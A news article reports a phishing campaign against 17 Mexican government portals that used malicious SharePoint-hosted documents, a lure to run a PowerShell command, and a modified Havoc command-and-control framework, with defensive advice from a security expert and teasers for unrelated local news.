back Back to news
Health Politics Economy Local March 05, 2025

New phishing attack on government institutions

A sophisticated phishing attack jeopardizes 17 government portals in Mexico, using malicious documents in Microsoft SharePoint to take control of sensitive information.

New phishing attack on government institutions

A new sophisticated and dangerous phishing campaign has compromised at least 17 portals of Mexican government agencies that handle critical and sensitive information. Víctor Ruiz, founder of SILIKN, warns that the integration of legitimate Microsoft services in this campaign makes it highly sophisticated and difficult to detect. Ruiz emphasizes that, in addition to basic anti-phishing measures, it is essential for government agencies to alert their employees about emails requesting the execution of commands in PowerShell or in a terminal, as this may be a sign of an attack.

Among the vulnerable institutions are the Mexican Institute of Industrial Property (IMPI), the Rewards Program of the Attorney General's Office, the Information Portfolio of the National Banking and Securities Commission (CNBV), as well as several state systems in San Luis Potosí. Ruiz recommends that these institutions conduct thorough reviews of their systems, strengthen the protection of their Microsoft 365 accounts, and train their employees to identify suspicious emails and fraudulent procedures.

The phishing campaign uses malicious documents in Microsoft SharePoint to trick users and take control of their systems. Víctor Ruiz explains that attackers exploit the Microsoft Graph API within SharePoint to hide command and control (C2) communications as legitimate traffic, making them difficult to detect. The attack begins with a phishing email enticing the recipient to open an attachment named “Documents.html” and execute a PowerShell command that activates the malware, compromising the system.

The expert warns that cybercriminals use a powerful open-source command and control framework called Havoc to gain full control of the compromised system. This malware is a modified version of Havoc, designed to hide within real Microsoft tools and evade traditional defenses. It is essential for government institutions to strengthen their security measures and train their personnel to protect themselves from this increasingly sophisticated and dangerous threat.

Latest news

See all news
Controversial Death Penalty Case in Mexico
March 01, 2025

Controversial Death Penalty Case in Mexico

The case of Ramón Montoya, the first Mexican executed in the U.S., raises questions about justice and the death penalty's ethics. Despite protests, he was executed after 10 years on death row.
Politics Health Local
Massive Fire in San Luis Potosí Factory
February 19, 2025

Massive Fire in San Luis Potosí Factory

A large fire broke out at a pallet factory in San Luis Potosí, leading to smoke spreading across the area. Emergency services are on-site managing the situation and evacuating nearby schools.
Health Politics Events Local
Demand Justice for the Femicide of Daniela Martell
February 15, 2025

Demand Justice for the Femicide of Daniela Martell

The death of Daniela Martell Orozco has sparked mobilizations in San Luis Potosí. Her disappearance and murder are being investigated, raising concerns about gender-based violence in Mexico.
Politics Health Local